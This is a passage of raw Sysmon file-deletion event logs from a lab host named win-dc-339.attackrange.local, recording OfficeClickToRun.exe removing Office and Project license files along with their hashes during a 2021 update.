23542300x800000000000000067698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp-ul-oob.xrm-msMD5=D74D697372D3E115C682E80ECB1DB819,SHA256=FFAE8FA3768C3FC70D7FFD871FC16FB8B277DB6445DCDF1068FA519C3D1FB432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp-ppd.xrm-msMD5=CC5446E8898EF3192B5F007EE2841631,SHA256=DD797B238716CC144D16865801BC7D8AB4C53100F19A312B85F421F91C51AA89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_OEM_Perp-pl.xrm-msMD5=9565D4A7B6C2EC479DEC369A53A0CC53,SHA256=4D694D9B0B307854BD1DD758782D53CDA2A5A19466F75A22A39B2398FD8EBCDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Grace-ul-oob.xrm-msMD5=52C96D4954302010C498DAA1B84EA773,SHA256=3B93E06C0B85E78CA6B90E5C26E9DD6671F19552AA81F0BA7D7EEA9408E32F96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-msMD5=0041D59778D7D9C104E31E500C37F211,SHA256=1801019C408A4A93497115C17C3EA2766A3D835B15EECB6F0C3E0857B9C2E71D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019MSDNR_Retail-ul-phn.xrm-msMD5=CC8FBD6E3A1397A0C43150C3C0C42A88,SHA256=56B8D46B9B8EC861FEC12B53A714F2A8A2C01F3572CC4D6DBEB4AD46B5BAE93D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019MSDNR_Retail-ul-oob.xrm-msMD5=F0416404941EAF870F305C6118FC9CF8,SHA256=25CB4E1676DC1E85F7EB6B7749C3EF21051472574724426306168DE098AB9A5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019MSDNR_Retail-ppd.xrm-msMD5=8D188A29B4430E16CF6E338279328728,SHA256=58EB3432EBE86ADB1AB21441658AF289D738E9629E0BC108C742587A8781CA61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-msMD5=5C7AC46FEAEAEA6102B4C338CE9F1F27,SHA256=1EC7EE3907CB5655CE8D30959B4B0E1533B8E66CA5E2C522E88EC7F15E351854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=23959E416B9E3C53ED9F1183B1CF8526,SHA256=D9F564FC2518210ACF400EFCCF110984D818328E0FE42E75C39AAADA880CA197,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ppd.xrm-msMD5=B2289B713F4A3770D8D309B4FE100599,SHA256=CB734F2CC25585CEB4DA944AD7F805458EE6FE6D96302E9CA7C171AA5F0DE29C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-phn.xrm-msMD5=CB63DC22A109E64B9809D3E5851A579D,SHA256=F39FC69F55E7F211B1D834FC94E8B5AAA04AEC75BAAECC4EF9368C5E556D3BFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-msMD5=A110EB75BC25B66D17349C78721D3FCF,SHA256=425A69F9D00F5103D1952592C005D26C2B7DB8067C82B0723BB5CA3195C779DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ppd.xrm-msMD5=B0E534633EE32EEE2A2CF1D869FBA27B,SHA256=9DA0CE37B9F032B904CDC6FF4934EC65B1AA7B2C0E09E7F756B5037D46A967FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-msMD5=67D87C198C95D47441041EA164E21837,SHA256=45CD941B9CFF288EF80D591B04BE465D53E4126106B40095374F5A50B8BD253E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul.xrm-msMD5=CC99276FBB526002E34F0B6009178A74,SHA256=CD8FC217010E15506F148CF14DACF9F63FDDDBA3BBDF6314AC9CB67F886C4AB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=5AA8B3EF309C7F20BFB5B71D3C87E63B,SHA256=AA7A0EF244BBAC1B34172AEFD62C482E513E13E46EED2135A5030646528220D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=B6B649D9B03777D8C81AFBC178295CB6,SHA256=541188B4EB01BF70BDB8633CA79E41C220BC09EA5AAB61670B8C227D72C2CC74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_MAK-ul-phn.xrm-msMD5=8BCD7AE20C2C5D5009F4A6DFAAA8B1D7,SHA256=24E81A78B5F871B20A1E3D849A4DA8AFEA1B441E09A3F2660594A53CD3FB41A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_MAK-ul-oob.xrm-msMD5=2B6FDB21DD5D21C54DE772BB555D3867,SHA256=D38F22A40562E12FF35A5D5AA778C6BCB5CEA3424797898D8DB4977552B6EDA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_MAK-ppd.xrm-msMD5=9764C5F20091824B7BD57DDA39D40B51,SHA256=06F0F079733DD96EF469E9C55F5C6F2F7586BCD4A39B551D6ECB830BFBDEFE38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_MAK-pl.xrm-msMD5=FA4A835E85A349F2554B12D8EC7A129A,SHA256=BE44D16D938C0AEF266694DD85AF41AAFD8504877A8EAFD03D1905BF5119785E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_KMS_Client-ul.xrm-msMD5=34E26FF88D35BFA0207888910A4889CC,SHA256=36AA8FCB9AFF736701573592A6FD7682090C6A5030CF1FC55D621D2DF76CA3AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_KMS_Client-ul-oob.xrm-msMD5=75749158BAE1CBED2E642BCB678E69C6,SHA256=CD7D4EAD0CF5E78B9D4A9F35B01A8E2216DA8A155C110D9A164803878134E60B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-msMD5=C4B62ADC4813479E7433B132A397CD85,SHA256=4917723DA4211FC248BEC272746073A54BF0D335999624EE8230526713755950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Retail-ul-phn.xrm-msMD5=E5EE1FB05812D4696AE38E37F0C24A87,SHA256=D34C011FDAEB4E20A71B83C616EFA7C656187653EA163E95D613F851C3DDF42B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Retail-ul-oob.xrm-msMD5=47CAA64694A224C206370A62D57279FB,SHA256=C0B3E4A903A15404CF222F4C6034E4A0A1C22B533E11538D475D931B4E57A9E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Retail-ppd.xrm-msMD5=A36F82CDDCAC21A7D4F93D8D2AA1EDA2,SHA256=092D3BD58814B04C99A2410139CCFE877F0F46D36F46D4A34A1FFCEB04B5472F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Retail-pl.xrm-msMD5=D4496C633A71367E2886828D65A7B720,SHA256=923909D6411BCB8AA92419D81CE5A9FC6B689959A95F4A79948AD83A500BC37F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-msMD5=1581B8CB3382DAC03FE95ABEDB42B0AB,SHA256=247CE2CFAD07D98BD5CCDEE2D35CAD8A2FD89D1E88B7D5E3CCA8F8990255B2D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_OEM_Perp-ul-oob.xrm-msMD5=E721D0E9644FD789FCEC208089D2AB9E,SHA256=69E4418B673DAA1733EEED41301D5B1E38B2C3D654F305943C124995AD433CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_OEM_Perp-ppd.xrm-msMD5=7CEBAE0F33CE00ECF62360650ED1BEE1,SHA256=71430443DB3136F7E160D254051E1A10E121B09EC62B76148DE334EEAA779B66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_OEM_Perp-pl.xrm-msMD5=6E63CDB00FD8EF94FA75145518CBDA60,SHA256=122D1B448CA4D5C46A17A1E63284E8C7BBAEC808968A405E1E6982E9F008FD09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Grace-ul-oob.xrm-msMD5=91EECE6AB22EE06289F4F35F2B56CA53,SHA256=80BB132D91D3E6F67E44CACB604759C2076BF8389EE43E9022F7572BB3244C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdR_Grace-ppd.xrm-msMD5=00454B1383DC2DB9A7C5549C80665C9B,SHA256=4998CEA0D8AED963705FF8BD606DBEF452C696838E74A8ACF768EF7E924238C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTrial-ul-oob.xrm-msMD5=63E786C8183811F9C517C5433F66AA67,SHA256=7EB00AE3A43A20841DF6B613F83AF18019F69239D5D0A3A5AA028A2F109928ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTrial-ppd.xrm-msMD5=E59131D4126B6EA62B3EEEAB4A34E41F,SHA256=C9FD35E695328E0067BBB694F80DC487D2B06DB5A7899D639B82FAD2F202D26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTrial-pl.xrm-msMD5=EFD2C9B84EA0C5017971F507462E18A4,SHA256=E001D66740C9F0B3BDF2E7E91D973F73057580E380E2EF9165F43DB99C304FAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTest-ul-oob.xrm-msMD5=C140BC2AD0D8ABA3A81172863511467E,SHA256=2B10F857EE076B8B77672FF8E50170EDAE67F770266FEA047ECA71A0D70B9F0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTest-ppd.xrm-msMD5=35E0AB0CF35530EAD2F1CB24D2F61A7D,SHA256=0E92CF69B81C2BF092694871B5133775A7306E75876F34504953713DF93F4B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_SubTest-pl.xrm-msMD5=478AD0D8160C300EA5831ECE8EEBE8BA,SHA256=B1E511B58D792AAB72F4121ACB0350D41653ADFFEDDF6AEDB5EE685CDBBB329F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-msMD5=2E162783DB223BC54846F6378B15E922,SHA256=6569C9A51C3ED42F775FA47883D05E3E06668899A4D3C459FF437194AB73BDE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_Subscription-ppd.xrm-msMD5=149010A26ABA6FA4BD4318F4D65AED78,SHA256=72C93EADDC2407750DF6835779B5CDB83F5FB661B30DB42D6D56CF080E42C443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 